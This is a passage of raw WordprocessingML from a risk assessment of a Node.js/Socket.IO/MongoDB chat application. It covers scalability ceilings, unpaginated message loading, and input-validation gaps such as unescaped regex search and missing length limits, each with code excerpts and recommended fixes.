          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>latestMessage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> field that references the most recent message. This field is updated in multiple places (send message, delete message, clear chat), creating potential for inconsistency if one update path fails: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chatModel.js:</w:t>
        <w:br/>
        <w:t>latestMessage: { type: mongoose.Schema.Types.ObjectId, ref: "Message" }</w:t>
        <w:br/>
        <w:t>// This is a denormalized reference that can become stale if the referenced message is deleted</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.3 Threat Scenario</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. A group chat accumulates 50,000 messages over several months. 2. A user opens the chat, triggering </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>GET /api/message/:chatId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. 3. The server attempts to load all 50,000 documents into memory. 4. Server memory spikes, potentially causing other requests to be delayed or rejected. 5. The 50,000-message JSON response takes several seconds to transmit. 6. The client browser becomes unresponsive while parsing and rendering the data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.4 Current Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">- The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$addToSet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operator prevents duplicate entries in both arrays. - Application code consistently updates both </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>readBy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>deliveredTo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> together. - Message deletion handlers update </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>latestMessage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the previous message.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.5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cursor-based pagination for message history (limit 50 per request)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Add a Mongoose custom validator to enforce </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>readBy ⊆ deliveredTo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> at schema level</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Add database indexes on </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Message.chat</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Message.createdAt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> for efficient paginated queries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Implement virtual scroll in the frontend to render only visible messages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r>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6. Risk Area 5: Scalability Constraints</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Severity: 🟡 MEDIUM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.1 Identification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The current architecture is designed for single-process, single-server deployment, which limits horizontal scalability and imposes performance ceilings as the user base grows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.2 Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Constraint A — Single Process Architecture:</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w:t>
        <w:br/>
        <w:t>const server = app.listen(PORT, ...);</w:t>
        <w:br/>
        <w:t>const io = require("socket.io")(server, ...);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The entire application — HTTP server, Socket.IO engine, and in-memory state — runs within a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>single Node.js process</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. This means: - Only one CPU core is utilized, regardless of the server hardware's multi-core capability. - A single CPU-intensive operation (e.g., large aggregation query) blocks the event loop for all connected users. - There is no fault tolerance; a crash takes down the entire service.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Constraint B — Global Broadcast for Status Changes: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 — User status change broadcast:</w:t>
        <w:br/>
        <w:t>io.emit("user status change", {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    userId,</w:t>
        <w:br/>
        <w:t xml:space="preserve">    status: "online",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    lastSeen: now,</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>io.emit()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> broadcasts to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>every connected socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. With N users online, each status change generates N WebSocket write operations. For frequent status transitions (users going active/away repeatedly), this creates O(N) network overhead per event.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Constraint C — Per-Request Aggregation for Unread Counts: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chatControllers.js — fetchChats:</w:t>
        <w:br/>
        <w:t>const unreadCounts = await Message.aggregate([</w:t>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        $match: {</w:t>
        <w:br/>
        <w:t xml:space="preserve">            chat: { $in: chatIds },</w:t>
        <w:br/>
        <w:t xml:space="preserve">            sender: { $ne: req.user._id },</w:t>
        <w:br/>
        <w:t xml:space="preserve">            readBy: { $ne: req.user._id },</w:t>
        <w:br/>
        <w:t xml:space="preserve">            isSystemMessage: { $ne: true },</w:t>
        <w:br/>
        <w:t xml:space="preserve">            deletedFor: { $ne: req.user._id },</w:t>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
        <w:br/>
        <w:t xml:space="preserve">    { $group: { _id: "$chat", count: { $sum: 1 } } },</w:t>
        <w:br/>
        <w:t>]);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This aggregation pipeline runs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>on every `GET /api/chat` request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for every user. With M chats and K messages, the pipeline scans up to M×K message documents per request. For a user with 50 chats and 10,000 total messages, this represents significant database I/O per page load.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.3 Scaling Ceiling Estimates</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Metric</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Current Capacity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Bottleneck</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Concurrent WebSocket connections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~1,000-5,000 per process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Single Node.js event loop + memory</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Message throughput</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~500-1,000 messages/second</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Database write latency + broadcast fanout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Status broadcast overhead</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O(N) per status change</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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io.emit()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> to all sockets</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Unread count query time</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O(M×K) per user page load</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MongoDB aggregation without indexes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.4 Current Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>- Node.js's non-blocking I/O handles concurrent connections efficiently for small-to-medium user bases. - MongoDB's WiredTiger engine provides efficient read performance for moderate data volumes. - Socket.IO's internal buffering handles burst traffic gracefully.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.5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Node.js clustering (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>cluster</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> module) to utilize multiple CPU cores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Use Redis as Socket.IO adapter for multi-process WebSocket state sharing</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Cache unread counts in Redis, update incrementally on message events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Replace global </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>io.emit()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> with targeted room-based broadcasts for status changes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Add database indexes on frequently queried fields (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>chat</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>sender</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>readBy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w: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bl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7. Risk Area 6: Input Validation &amp; Error Handling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Severity: 🟢 LOW-MEDIUM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>7.1 Identification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Several API endpoints accept user input with minimal validation, relying on framework defaults and database constraints rather than explicit input sanitization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>7.2 Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vulnerability A — Unsafe JSON Parsing:</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chatControllers.js, line 230:</w:t>
        <w:br/>
        <w:t>var users = JSON.parse(req.body.users);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>JSON.parse()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> throws a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SyntaxError</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if the input is not valid JSON. While </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>express-async-handler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> catches this error and passes it to the error middleware, the error message may expose internal implementation details:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="283" w:right="283"/>
        <w:shd w:fill="F4F4F4" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="282828"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SyntaxError: Unexpected token 'x' in JSON at position 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vulnerability B — No Content Length Limits:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>There is no validation on the length of message content, chat names, or user display names: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messageControllers.js — sendMessage:</w:t>
        <w:br/>
        <w:t>const { content, chatId } = req.body;</w:t>
        <w:br/>
        <w:t>if (!content || !chatId) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return res.sendStatus(400);</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>// No check: content.length &lt;= MAX_MESSAGE_LENGTH</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A malicious user could send a message containing millions of characters, consuming disproportionate database storage and causing rendering performance issues for recipients.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vulnerability C — Regex-Based Search Without Escaping:</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userControllers.js:</w:t>
        <w:br/>
        <w:t>{ name: { $regex: req.query.search, $options: "i" } }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The search query is passed directly into a MongoDB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$regex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operator without escaping special regex characters. A user could submit a crafted regex pattern (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) that causes excessive backtracking, potentially leading to a ReDoS (Regular Expression Denial of Service) attack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>7.3 Current Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>express-async-handler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> wraps all route handlers, preventing unhandled exceptions from crashing the server. - The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>errorHandler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> middleware in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>errorMiddleware.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> standardizes error responses. - React's JSX rendering automatically escapes HTML entities, preventing stored XSS from rendering in the UI. - MongoDB document size limit (16MB) provides an implicit upper bound on individual message size.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>7.4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Wrap </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>JSON.parse</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> in try-catch with sanitized error messages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Add content length validation (e.g., max 5,000 characters per message)</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Escape regex special characters in search queries using </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>escapeRegex()</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Implement request body size limits via </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>express.json({ limit: '1mb' })</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Add input sanitization library (e.g., </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>validator.js</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>express-validator</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w: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bl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8. Risk Area 7: Frontend Architecture, Client-Side Resilience &amp; UX Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Severity: 🟡 MEDIUM-HIGH</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.1 Identification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>While backend architectural risks threaten data integrity and server resources, the frontend Single Page Application (React.js) contains several vulnerabilities that directly threaten client-side stability, browser memory consumption, responsiveness, and user experience resilience under real-world conditions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.2 Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vulnerability A — Unvirtualized DOM Tree Bloat (`ScrollableChat.js`):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>frontend/src/components/ScrollableChat.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, the chat message history is rendered via an unrestricted </w:t>
      </w:r>
